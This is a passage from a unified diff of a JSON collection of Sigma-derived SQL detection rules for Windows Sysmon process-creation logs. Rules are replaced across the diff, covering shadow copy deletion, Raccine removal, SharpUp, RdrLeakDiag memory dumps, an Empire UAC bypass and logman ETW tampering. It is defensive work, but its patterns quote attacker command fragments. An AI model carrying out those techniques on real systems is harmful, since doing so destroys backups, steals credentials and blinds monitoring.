"description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory 